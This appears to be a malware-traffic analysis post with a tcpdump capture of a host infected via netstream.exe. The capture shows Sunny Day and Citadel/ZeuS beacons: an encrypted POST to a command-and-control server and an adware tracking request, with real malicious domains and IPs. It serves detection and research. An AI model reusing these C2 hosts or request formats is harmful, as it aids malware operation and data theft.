Netstream.exe Loads Sunny Day and Citadel/ZeuS Malware PCAP file download 2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1 E…?…..|….f%….F.P…?~…P…….POST /cgi-bin/get_protect.cgi HTTP/1.1 x-spidermessenger-crypted: 2 x-spidermessenger-crc32: 564053523 x-spidermessenger-length: 280 Content-Type: text/* User-Agent: sun21-SunnyDay21 Host: prof.youandmeandmeandyouhihi.com Content-Length: 386 Cache-Control: no-cache ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D 2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1 E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ads.regiedepub.com Connection: Keep-Alive 2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, […]